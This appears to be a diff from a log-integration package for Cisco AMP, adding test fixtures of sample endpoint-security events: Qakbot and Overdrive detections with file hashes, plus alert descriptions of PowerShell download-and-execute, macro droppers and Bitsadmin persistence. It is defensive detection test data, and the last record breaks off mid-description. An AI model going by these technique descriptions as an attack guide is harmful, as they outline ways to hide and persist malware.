"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Command_Line_Arguments_Kovter", + "hostname": "Demo_Command_Line_Arguments_Kovter" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854070258Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", + "kind": "alert", + "start": "2021-01-14T10:47:17.000Z", + "action": "Cloud IOC", + "id": "1476905066250000100", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "b6:9c:d0:89:b8:66", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": 
"test_connector_guid", + "related": { + "mac": [ + "b6:9c:d0:89:b8:66" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.PowershellDownloadedExecutable.ioc", + "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff" + } + }, + "@timestamp": "2021-01-14T10:47:17.000Z", + "file": { + "name": "powershell.exe", + "path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "hash": { + "sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Command_Line_Arguments_Kovter", + "hostname": "Demo_Command_Line_Arguments_Kovter" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854072129Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", + "kind": "alert", + "start": "2021-01-14T10:47:17.000Z", + "action": "Cloud IOC", + "id": "1476905066228000300", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "b6:9c:d0:89:b8:66", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "b6:9c:d0:89:b8:66" + ] + }, + "group_guids": [ + 
"test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.WinWord.Powershell", + "description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "file": { + "hash": { + "sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854074002Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6411425813945647000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6411425813945647106", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "file": { + "hash": { + "sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854075908Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine", + "id": "6411425813945647000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "detection_id": "6411425813945647105", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648155 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "file": { + "name": 
"AySxs.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe", + "hash": { + "sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854077773Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411425813945647000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.12081E6CA3-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411425813945647106", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log new file mode 100644 index 00000000000..211de5d2bc9 --- /dev/null 
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log 
@@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a
8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5
e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. 
